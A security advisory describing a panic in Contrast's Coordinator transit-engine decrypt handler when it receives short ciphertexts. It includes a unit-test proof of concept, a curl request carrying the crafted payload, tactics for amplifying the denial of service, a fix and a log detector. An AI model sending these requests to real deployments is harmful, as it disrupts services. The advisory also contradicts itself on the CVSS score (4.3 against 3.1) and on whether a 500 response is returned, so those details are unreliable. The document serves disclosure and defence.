GHSA-3ccm-4qq2-5wrp · MEDIUM · CVSS 4.3

Contrast's coordinator transit engine `ciphertextContainer.UnmarshalJSON` panics on attacker-controlled short ciphertexts

Published Jul 1, 2026 · Updated Jul 1, 2026

Description

## Summary

`ciphertextContainer.UnmarshalJSON` decodes the third `:`-separated component of a `vault:vX:base64...` ciphertext and then unconditionally takes a 12-byte prefix slice for the AES-GCM nonce: `c.nonce = fullCiphertext[:aesGCMNonceSize]`. If the decoded blob is shorter than 12 bytes, the slice expression panics. The panic happens before any cryptographic operation, while the JSON body of the request is still being parsed inside the request handler. Because the handler is invoked from `net/http`'s standard handler goroutine, the panic is recovered to a 500 response, but the request handler aborts mid-execution and the recovered panic appears in the Coordinator's logs. An authenticated workload that holds a valid mesh certificate for any `WorkloadSecretID` can trigger the panic at will, producing log spam, request-failure metrics, and a slow but cheap denial of service against the transit-engine endpoint.

## Details

### the panicking slice

`coordinator/internal/transitengineapi/crypto.go:64-88`:

```go
// UnmarshalJSON umarshalls a json string to a ciphertextContainer holding the version prefix,
// decoded base64 nonce and ciphertext.
func (c *ciphertextContainer) UnmarshalJSON(data []byte) error {
	var encoded string
	if err := json.Unmarshal(data, &encoded); err != nil {
		return err
	}

	// Split "vault:vX:base64" format
	parts := strings.SplitN(encoded, ":", 3)
	if len(parts) < 3 {
		return fmt.Errorf("invalid ciphertext format")
	}
	version, err := extractVersion(parts[1])
	if err != nil {
		return fmt.Errorf("ciphertext version: %w", err)
	}
	c.keyVersion = version
	fullCiphertext, err := base64.StdEncoding.DecodeString(parts[2])
	if err != nil {
		return fmt.Errorf("decoding ciphertext: %w", err)
	}
	c.nonce = fullCiphertext[:aesGCMNonceSize] // PANIC when len(fullCiphertext) < 12
	c.ciphertext = fullCiphertext[aesGCMNonceSize:]
	return nil
}
```

`aesGCMNonceSize = 12` (defined at line 33). There is no length check on `fullCiphertext`. If `parts[2]` decodes to fewer than 12 bytes (which happens for any base64 string shorter than ~16 characters), the slice expression `fullCiphertext[:aesGCMNonceSize]` triggers Go's runtime panic `runtime error: slice bounds out of range [:12] with length N`.

`UnmarshalJSON` is reached from `parseRequest`:

```go
// coordinator/internal/transitengineapi/transitengineapi.go:292-302
func parseRequest(r *http.Request, into any) error {
	defer r.Body.Close()
	if err := validateContentType(r); err != nil {
		return err
	}
	if err := json.NewDecoder(r.Body).Decode(into); err != nil {
		return err
	}
	return nil
}
```

which is called inside `getDecryptHandler` (line 178-237) before any other processing.

### auth requirement is real but trivial to satisfy for any registered workload

The transit-engine HTTP server (`transitengineapi.go:74-100`) configures `tls.RequireAndVerifyClientCert` with the Coordinator's mesh CA pool. The handler is wrapped by `authorizationMiddleware` (line 348-357) which calls `authorizeWorkloadSecret` (line 241-254). That function reads the `WorkloadSecretOID` extension from the peer cert and requires it to match the URL path's `{name}` segment.

Any workload that has gone through the normal initializer / meshapi flow (`coordinator/internal/meshapi/meshapi.go:71-119`) and has a non-empty `WorkloadSecretID` in its `PolicyEntry` is issued a mesh cert with the matching extension, so the path-name authorisation is automatically satisfied for whichever `workloadSecretID` the manifest assigned to that workload.

There is no rate limiting, no proof-of-work, and no audit log on triggering the panic.

### what happens after the panic

`net/http` wraps each handler in a recovered goroutine, so the panic does not crash the Coordinator process. Instead:

1. The Go runtime captures the panic, logs `http: panic serving <peer>: runtime error: slice bounds out of range` to stderr together with a goroutine stack trace.
2. The connection is hung up without a response body (`http.Server.serve` calls `c.close()` in the recovery path).
3. The grpc-prometheus / handler metrics (registered via `promRegistry`) record the request as failed.
4. The recovered panic appears in the Coordinator's logs / journald, creating noise that an operator monitoring a real attack would have to filter out.

A workload that wants to amplify the impact can:

* Loop the request to fill the journal with stack traces (cheap operation per request, expensive log volume).
* Combine with a second valid workload identity to bypass any per-cert rate limiting added later.
* Use the panic stack trace (which contains internal source paths) as a fingerprint to determine the exact Coordinator version in lieu of a `/version` endpoint.

The panic also avoids returning a JSON error body to the caller, so callers that depend on a structured error are forced into a less informative failure mode (HTTP-level connection close).

## PoC

The bug is deterministic. Drop the following test into `coordinator/internal/transitengineapi/crypto_test.go`:

```go
func TestCiphertextContainer_UnmarshalJSON_ShortBlobPanics(t *testing.T) {
	// "AAAA" base64-decodes to 3 bytes, well under aesGCMNonceSize=12.
	body := []byte(`"vault:v1:AAAA"`)
	defer func() {
		if r := recover(); r == nil {
			t.Fatalf("expected panic, got nil")
		}
	}()
	var c ciphertextContainer
	_ = c.UnmarshalJSON(body) // panics: slice bounds out of range [:12] with length 3
}
```

End-to-end against a running Coordinator (omitted for static review; would require a Contrast cluster and a mesh-certificate-holding workload):

```bash
$ curl -k --cert workload.crt --key workload.key \
    -H 'Content-Type: application/json' \
    -d '{"ciphertext":"vault:v1:AAAA","associated_data":""}' \
    https://coordinator:8200/v1/transit/decrypt/<my-workload-secret-id>
# Connection: closed without HTTP response body.
# Coordinator log:
#   http: panic serving 10.0.0.5:54321: runtime error: slice bounds out of range [:12] with length 3
#   goroutine 4711 [running]:
#   net/http.(*conn).serve.func1(...)
#       net/http/server.go:1883 +0xb0
#   panic({0x...?, 0x...?})
#       runtime/panic.go:770 +0x132
#   github.com/edgelesssys/contrast/coordinator/internal/transitengineapi.(*ciphertextContainer).UnmarshalJSON(...)
#       coordinator/internal/transitengineapi/crypto.go:85 +0x...
```

## Impact

* **Soft denial of service** against the transit-engine endpoint per workload identity. The Coordinator process survives because of `net/http`'s panic recovery, but each panicked request consumes CPU for the recovery / stack dump and floods the operator's logs.
* **Information disclosure via stack trace** in the Coordinator log. The trace pins the Coordinator binary version, the build path of the `transitengineapi` package, and exact line numbers of internal source. This is a low-grade fingerprint, but it is leaked even to operators who would normally only see the binary version through controlled means.
* **Loss of structured error reporting**: legitimate decrypt requests sharing the panicked log lines may be harder to attribute, and the API consumer sees a connection-close instead of a 4xx response, masking the cause.

CVSS rationale: `AV:N`, `AC:L`, `PR:L` (any workload with a transit-engine permission can do this), `UI:N`, `S:U`, `C:N` / `I:N` / `A:L` (low availability impact: log noise + per-request CPU cost; no full DoS because Go's HTTP panic recovery keeps the process up). Score `3.1`.

## Recommended Fix

Validate the decoded length before slicing. The minimal change at `coordinator/internal/transitengineapi/crypto.go:81-87`:

```go
fullCiphertext, err := base64.StdEncoding.DecodeString(parts[2])
if err != nil {
	return fmt.Errorf("decoding ciphertext: %w", err)
}
if len(fullCiphertext) < aesGCMNonceSize {
	return fmt.Errorf("ciphertext is too short: got %d bytes, expected at least %d for the nonce",
		len(fullCiphertext), aesGCMNonceSize)
}
c.nonce = fullCiphertext[:aesGCMNonceSize]
c.ciphertext = fullCiphertext[aesGCMNonceSize:]
return nil
```

A defence-in-depth tightening would also reject ciphertexts with `len(fullCiphertext) <= aesGCMNonceSize` (which would yield an empty actual ciphertext that AES-GCM open would later reject anyway, but a sharper boundary fails earlier with a clearer error).

Add a unit test along the lines of the PoC that asserts a clean error rather than a panic.
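
For operators who cannot upgrade immediately, the log signature described under "what happens after the panic" can be triaged per peer. The following is an added example, not code from the advisory or the Contrast project: it counts recovered panics whose header shows the `[:12]` slice bound and whose stack trace contains the `UnmarshalJSON` frame. The function names, the log timestamp prefix and the sample log are assumptions constructed for illustration.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"regexp"
	"sort"
	"strings"
)

// frameMarker is the stack frame the advisory's trace shows for this bug.
const frameMarker = "transitengineapi.(*ciphertextContainer).UnmarshalJSON"

// panicHeader matches net/http's panic line for a [:12] slice (12 = aesGCMNonceSize).
var panicHeader = regexp.MustCompile(
	`http: panic serving (\S+): runtime error: slice bounds out of range \[:12\] with length \d+`)

// sampleLog is constructed for this example; timestamps, peers and goroutine IDs are made up.
const sampleLog = `2026/07/01 10:00:01 http: panic serving 10.0.0.5:54321: runtime error: slice bounds out of range [:12] with length 3
goroutine 4711 [running]:
github.com/edgelesssys/contrast/coordinator/internal/transitengineapi.(*ciphertextContainer).UnmarshalJSON(...)
2026/07/01 10:00:02 http: panic serving 10.0.0.5:54400: runtime error: slice bounds out of range [:12] with length 0
github.com/edgelesssys/contrast/coordinator/internal/transitengineapi.(*ciphertextContainer).UnmarshalJSON(...)
2026/07/01 10:00:03 http: panic serving 10.0.0.9:40000: runtime error: slice bounds out of range [:12] with length 3
example.com/other/pkg.parse(...)
2026/07/01 10:00:04 http: panic serving 10.0.0.7:41000: runtime error: invalid memory address or nil pointer dereference
`

// CountShortCiphertextPanics returns, per peer host, the number of recovered panics
// whose header matches and whose following stack trace contains frameMarker.
func CountShortCiphertextPanics(text string) map[string]int {
	counts := map[string]int{}
	pending := "" // peer whose matching header still awaits the confirming frame
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := sc.Text()
		if strings.Contains(line, "http: panic serving ") {
			pending = "" // new panic record: drop any unconfirmed one
			if m := panicHeader.FindStringSubmatch(line); m != nil {
				pending = m[1]
				if host, _, err := net.SplitHostPort(m[1]); err == nil {
					pending = host // group by host, ignoring the ephemeral port
				}
			}
		} else if pending != "" && strings.Contains(line, frameMarker) {
			counts[pending]++
			pending = ""
		}
	}
	return counts
}

// Report lists peers with at least threshold matching panics, sorted by address.
func Report(counts map[string]int, threshold int) []string {
	var out []string
	for peer, n := range counts {
		if n >= threshold {
			out = append(out, fmt.Sprintf("%s panics=%d", peer, n))
		}
	}
	sort.Strings(out)
	return out
}

func main() {
	fmt.Println(strings.Join(Report(CountShortCiphertextPanics(sampleLog), 2), "\n"))
}
```

The address `net/http` logs is the TCP peer, not the mesh-certificate identity, so the per-host count is a starting point for correlation rather than an attribution.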

Affected Packages (1)

github.com/edgelesssys/contrast (Go)
Fixed in = 1.20.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
